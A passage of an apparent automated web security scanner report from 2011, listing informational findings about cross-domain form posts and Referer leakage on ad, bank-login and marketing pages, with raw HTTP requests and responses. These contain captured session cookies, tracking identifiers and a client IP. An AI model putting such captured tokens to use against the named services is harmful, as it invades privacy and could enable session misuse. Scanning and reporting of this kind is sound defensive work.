GET /sem/g/content/pt-wireless/070610?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534 HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response 1

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:42:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless network strength monitor|formlessnetworking.com|C||7322411534
Set-Cookie: ASP.NET_SessionId=h20adracgrtmkruo5uvfe32b; path=/
Set-Cookie: Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; path=/
Set-Cookie: EntryPoint=/sem/g/content/pt-wireless/070610; domain=scriptlogic.com; expires=Thu, 03-May-2012 13:42:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 282

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless network strength monitor|formlessnetworking.com|C||7322411534'>here</a>.</h2>
</body></html>

Request 2

GET /sem/g/content/pt-wireless/070610?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534 HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless network strength monitor|formlessnetworking.com|C||7322411534
Set-Cookie: ASP.NET_SessionId=j2y3mh55ylvyef555uy0dx45; path=/
Set-Cookie: EntryPoint=/sem/g/content/pt-wireless/070610; domain=scriptlogic.com; expires=Thu, 03-May-2012 13:42:27 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 282

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless network strength monitor|formlessnetworking.com|C||7322411534'>here</a>.</h2>
</body></html>

20.4. http://www2.itt-tech.edu/it/d/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www2.itt-tech.edu
Path:   /it/d/

Request 1

GET /it/d/?code=12268064030|networking%20security HTTP/1.1
Host: www2.itt-tech.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:50 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Set-Cookie: ITD=12268064030%7Cnetworking%20security;domain=.itt-tech.edu;expires=Thu, 25-Apr-2041 13:35:50 GMT;path=/
Set-Cookie: FLOWSIM5=http%3A%2F%2Fwww%2Esedoparking%2Ecom%2Fsearch%2Fregistrar%2Ephp%3Fregistrar%3Dsedonewreg%26domain%3Dformlessnetworking%2Ecom;expires=Thu, 25-Apr-2041 13:35:50 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 25005



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
       <title>ITT Tech</title>
       <script language="JavaScript" src="scripts/jquery.js" type="text/javascript"></script>
       <script language="JavaScript" src="scripts/livevalidation.js" type="text/javascript"></script>
       <script language="JavaScript" src="scripts/brochureservice.js" type="text/javascript"></script>
       <script language="JavaScript" type="text/javascript">
           var user_ip = "173.193.214.243";
       </script>
       <link rel="stylesheet" type="text/css" href="css/style.css"/>
       <link rel="stylesheet" type="text/css" href="css/livevalidation.css"/>
<!-- www2.itt-tech.edu/it and /it/d - all entry pages. Google Code for IT Remarketing Visitor Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1005090170;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "4QdQCNavnwIQ-uqh3wM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1005090170/?label=4QdQCNavnwIQ-uqh3wM&guid=ON&script=0"/>
</div>
</noscript>
   </head>
   
   <body>
       <table width="950" cellpadding="0" cellspa
...[SNIP]...

Request 2

GET /it/d/?code=12268064030|networking%20security HTTP/1.1
Host: www2.itt-tech.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:54 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Set-Cookie: ITD=12268064030%7Cnetworking%20security;domain=.itt-tech.edu;expires=Thu, 25-Apr-2041 13:35:54 GMT;path=/
Set-Cookie: FLOWSIM5=;expires=Thu, 25-Apr-2041 13:35:54 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 25005



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
       <title>ITT Tech</title>
       <script language="JavaScript" src="scripts/jquery.js" type="text/javascript"></script>
       <script language="JavaScript" src="scripts/livevalidation.js" type="text/javascript"></script>
       <script language="JavaScript" src="scripts/brochureservice.js" type="text/javascript"></script>
       <script language="JavaScript" type="text/javascript">
           var user_ip = "173.193.214.243";
       </script>
       <link rel="stylesheet" type="text/css" href="css/style.css"/>
       <link rel="stylesheet" type="text/css" href="css/livevalidation.css"/>
<!-- www2.itt-tech.edu/it and /it/d - all entry pages. Google Code for IT Remarketing Visitor Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1005090170;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "4QdQCNavnwIQ-uqh3wM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1005090170/?label=4QdQCNavnwIQ-uqh3wM&guid=ON&script=0"/>
</div>
</noscript>
   </head>
   
   <body>
       <table width="950" cellpadding="0" cellspacing="0" border="0" align="center">
           <tr>
               <td class="header_1"><img src="http://images.itt-tech.edu/images/itt-logo.pn
...[SNIP]...

21. Cross-domain POST  previous  next
There are 3 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


21.1. http://jscrollpane.kelvinluck.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jscrollpane.kelvinluck.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: jscrollpane.kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:19 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 09:42:16 GMT
ETag: "74ba63a-3abc-49a946a4b4e00"
Accept-Ranges: bytes
Content-Length: 15036
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
       "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>

       <title>jScrollPane - cross browser styleable scrollbars with jQuery and CSS</
...[SNIP]...
</p>
           <form method="post" action="https://www.paypal.com/cgi-bin/webscr" style="margin: 15px 0 0 20px;">
               <input type="hidden" value="_donations" name="cmd">
...[SNIP]...

21.2. http://webcache.googleusercontent.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webcache.googleusercontent.com
Path:   /search

Issue detail

The page contains a form which POSTs data to the domain www.barclaycardus.com. The form contains the following fields:

Request

GET /search?q=cache:_Is84meKSVgJ:https://www.barclaycardus.com/+barkley+bank&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com HTTP/1.1
Host: webcache.googleusercontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 13:28:10 GMT
Expires: -1
Cache-Control: private, max-age=0
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<base href="https://www.barclaycardus.com/"><div style="margin:-1px -1px 0;padding:0;border:1px solid #999;background:#fff"><div sty
...[SNIP]...
</h2>
               
               
                <form name="LoginForm" method="post" action="https://www.barclaycardus.com/app/ccsite/action/login" target="_top" autocomplete="off">
<input type="hidden" name="action" value="login_user">
...[SNIP]...

21.3. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /landing/google/packettrapit/wireless.asp

Issue detail

The page contains a form which POSTs data to the domain now.eloqua.com. The form contains the following fields:

Request

GET /landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534 HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<div id="compactform">
<form name="GoogleLandingForm" id="GoogleLandingForm"
onsubmit="return submitForm(this,nologin);"
action="http://now.eloqua.com/e/f2.aspx" method="post">

<script type="text/javascript">
...[SNIP]...

22. Cross-domain Referer leakage  previous  next
There are 48 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


22.1. http://0.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.r.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?ld=4vAUcEwrCsfPOHOfJWvfzahd0z1SFKH0Ld-UNQa7vBRdH5cN5Ilexsh9zvjynNDPhQibaJzP8PBYSObXHla3y2Ji34Dw-yiPn6khtQOhAwZOSSPOoZTcKsxg0rmGEz9wUPvWZdMGuv7N0K-HUobYRIu6f0gNMPTqNqFyi_EWN038kSiFqsleaRwoJemjcMN8olLQNoMA0INYPqUjOr9_HmsVblIDjYeZWrmOLwbHw5gCGTvT_jgndDPtSw_HPt-Cek29FLbzU0nR8Lq7KnItXk7jVUCUwd00o-FeeprxbCe1hreTyBECZjcz1daIBnYg3YUPlAk3c9Dtak5_3GjMycpfJmfHsbQTUsBg HTTP/1.1
Host: 0.r.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.bbt.com/brightbanking/?ReferralSource=AE&CampIDMaj=AGU&CampIDMin=AR&cmpid=1852
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MSAnalytics=4vcc16a56d0a797cf7f71623cf9e89a7b8818c5b6c4a9c3053352f85174e8f51f42a6b39f5bb98efc9a7111941beeec98b55b0f9a2ee67a6bd95bb0be007e897a83554094c093c66d356ce876a629c55275f463acf10; expires=Fri, 17 Jun 2011 13:14:23 GMT; domain=.r.msn.com; path=/; httponly
Date: Tue, 03 May 2011 13:14:22 GMT
Connection: close
Content-Length: 232

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://www.bbt.com/brightbanking/?ReferralSource=AE&CampIDMaj=AGU&CampIDMin=AR&cmpid=1852">here</A>
...[SNIP]...

22.2. http://318395.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://318395.r.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?ld=4v_hbzQm1ki-9oG09tvND_eBTqGIUVDm0kSUR9iUZR9CMnXHAXWKMgLm2GaOgPG_7pcjxea2dPwxcjFTjS5Bq2p5Md0EeC0p1Zarf_SQPT-ubYlC9_FlLvIySTWoCLXLL6adLpzRPHAHEpJznQMJhEF1idRomdWjqcl80lY5cZi0mR04GoOlZuwJxTT3BS1qCg_35fRs14kvWhnfgkeiTG6gFia-PlPMffy8LtPIFjYVXy-L4D2tke2WAnreKsO30p8ytvV65faBwoA2HaFcW8mWaUvnh16JgxAzpR3Ijm9TMgeolm7AIGotXphmF2v3tMkI2E6MZXomYHxGq-vwoaXgB1PD7ywvoR-bYqGctAZQ72SKiqv5HnW7_fmYsctyR3FqdKOlMS5GxGOHZSAAy-41tBLublWT0QLaDcMEWc4ijWguYnwwfwoKzEs-Q69yf2ReHuTpTtmGa9ylR62-V29DVUCUwdejlv-zz3lvT8Ta-Z5QXpECZjcz0Zdh1eOntgBboqV52Oxh_mPKl4ZsgaMP66Hv1X5IjaXw HTTP/1.1
Host: 318395.r.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://18.xg4ken.com/media/redir.php?prof=134&camp=8291&affcode=kw105114&inhURL=&cid=194175631&mType=p&queryStr=banking%20thailand&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225549258%3B49327498%3Bb%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc130835&defurl=http://18.xg4ken.com/media/redir.php?prof=134&camp=8291&affcode=cr117319&cid=194175631|128579|banking&mType=p&queryStr=banking%20thailand&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225549258%3B49327498%3Bb%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc130835
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MSConv=4v35cff036c968c17c3c1b9754b84e1414ff62a440da5c0c02d44985d7ed74a810dbd456f500115d4acf9e0563754f54078cda27c18c20afc0ee9acf4b7596edbe4e852f5389ae825cba4f47036df294640ac638b16bbe0daf8ecfd3843b248a2a337097291e8135d4f0217706256f3373e4ee30dd15e759b4834636bd3de7115e3554094c5ba596e1c689019e4221921238bc15d710; expires=Fri, 17 Jun 2011 13:14:23 GMT; path=/; httponly
Set-Cookie: MSAnalytics=4v5dbda0f9976350b2c2c6cca6605da6d02f6b4cf63351a04f5a2be016b1291f70abb1fd9970a89ed4e62259270c5dac939e0458ba819429b4390836e70a1031c13554094cd8aad20d0033775e985d9802ee578db510; expires=Fri, 17 Jun 2011 13:14:23 GMT; domain=.r.msn.com; path=/; httponly
Date: Tue, 03 May 2011 13:14:23 GMT
Connection: close
Content-Length: 674

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://18.xg4ken.com/media/redir.php?prof=134&camp=8291&affcode=kw105114&inhURL=&cid=194175631&mType=p&queryStr=banking%20thailand&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225549258%3B49327498%3Bb%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc130835&defurl=http://18.xg4ken.com/media/redir.php?prof=134&camp=8291&affcode=cr117319&cid=194175631|128579|banking&mType=p&queryStr=banking%20thailand&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225549258%3B49327498%3Bb%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc130835">here</A>
...[SNIP]...

22.3. http://914188.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://914188.r.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?ld=4vSbUTJoQN1kMHch7IUzSTDF6KEcmTV3oCTXTzg1UKOGWZR0438G1oXvJPheB3mW2922CmIpL8NXrE_on_nQu04FX2Dt78uVsmpPTPt91XwOcXMZtjDB0jbp3w0oWfeEivLlGA_U4dc5PsTD-rQYGAzj0P4hrqH1Fibd2MMesGk6aRXESvBIjIVzOt806rCXQsIDYL75i7hkVQdmoUnMD4T4jNaZzhVtVxl6JDLQrl2a2PhJBfQXcqGNp75zB4JQaq0nPblF8ED9Z_kJseHw0S8-TRRfP4xJAzkyC4rJOP0rAmcoWSzTxnQN4luIXbWyW3NVQJTAlcjuoAVDCKCvS3t00cA7cQJmNzPQWc4yRg8U74xcuamAYK8kna4RbL2ygf5Eb6iSn1WAMi HTTP/1.1
Host: 914188.r.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object Moved
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://clickserve.dartsearch.net/link/click?lid=43000000393928176&ds_s_kwgid=58000000008587292&ds_e_matchtype=p&ds_e_kwdid=6111125402&ds_e_adid=638791044&ds_url_v=2&sadid=44000000109057176
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Server: Microsoft-IIS/6.0
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MSConv=4v216bac438add5ee7de0fda170314f0a14dded8e6443205158c9f73022bcb5d5ce9346e045a891b487e98d5224ea85a6a8fbb0203ffcc25c0fad5a2f72b5cd947813abd204a19390cd345bc0fee7f6b9df5f22c45c24fdcd7314b360dc1143903c02cf2a4674ca409725437aa5d19a41e67a2bc5939de581dadbe02e61acef28b3554094ce96353b882524f4fb894d18c121c60b610; expires=Fri, 17 Jun 2011 13:14:25 GMT; path=/; httponly
Set-Cookie: MSAnalytics=4v71707473937349ea9a7176c778099a2de7aa94aed8be730ce7d53426a480dbbe8a736e1abede370809d7b3f368e70462056dbc1c443b8cd450458ecdc4fa47043554094c938d0c19692bf45e695cbf28f21bc8dd10; expires=Fri, 17 Jun 2011 13:14:25 GMT; domain=.r.msn.com; path=/; httponly
Date: Tue, 03 May 2011 13:14:25 GMT
Connection: close
Content-Length: 331

<HTML>
<HEAD><TITLE>Document moved</TITLE></HEAD>
<BODY><H1>Object Moved</H1>This document may be found <A HREF="http://clickserve.dartsearch.net/link/click?lid=43000000393928176&ds_s_kwgid=58000000008587292&ds_e_matchtype=p&ds_e_kwdid=6111125402&ds_e_adid=638791044&ds_url_v=2&sadid=44000000109057176">here</A>
...[SNIP]...

22.4. http://ad.doubleclick.net/adi/agt.nbcuni/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/agt.nbcuni/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/agt.nbcuni/homepage;tile=6;sz=726x100;ord=1304429183? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 13:26:32 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2477

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
/index.php%3Fv%3Dnbc_the-biggest-loser_protein-perk%26icid%3Dproteinperk_mar2011" onFocus="ss('','aw0')" onMouseDown="st('aw0')" onMouseOver="return ss('','aw0')" onMouseOut="cs()" onClick="ha('aw0')"><img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CJmezcDCn77TywEQ1gUYZDIIBsAGbEFV898" border="0" width="726" height="100" /></a>
...[SNIP]...

22.5. http://ad.doubleclick.net/adi/agt.nbcuni/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/agt.nbcuni/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/agt.nbcuni/homepage;tile=7;sz=246x100;ord=1304429183? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 13:26:32 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2653

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
hp%3Fv%3Dnbc_the-biggest-loser_protein-perk%26icid%3D246x100_proteinperk_mar2011" onFocus="ss('','aw0')" onMouseDown="st('aw0')" onMouseOver="return ss('','aw0')" onMouseOut="cs()" onClick="ha('aw0')"><img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CMObpPL8kej39gEQ9gEYZDIIBujyth-cjT4" border="0" width="246" height="100" /></a>
...[SNIP]...

22.6. http://ad.doubleclick.net/adi/agt.nbcuni/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/agt.nbcuni/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/agt.nbcuni/homepage;tile=5;sz=246x100;ord=1304429183? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 13:33:15 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2646

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
universalstore.com/%3Fv%3Dmsnbc_lean-forward%26icid%3Dmsnbc_lean-forward_246x100" onFocus="ss('','aw0')" onMouseDown="st('aw0')" onMouseOver="return ss('','aw0')" onMouseOut="cs()" onClick="ha('aw0')"><img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CJeVw7SRrKWrtwEQ9gEYZDIIksD9eHL2Uaw" border="0" width="246" height="100" /></a>
...[SNIP]...

22.7. http://ad.doubleclick.net/adi/agt.nbcuni/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/agt.nbcuni/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

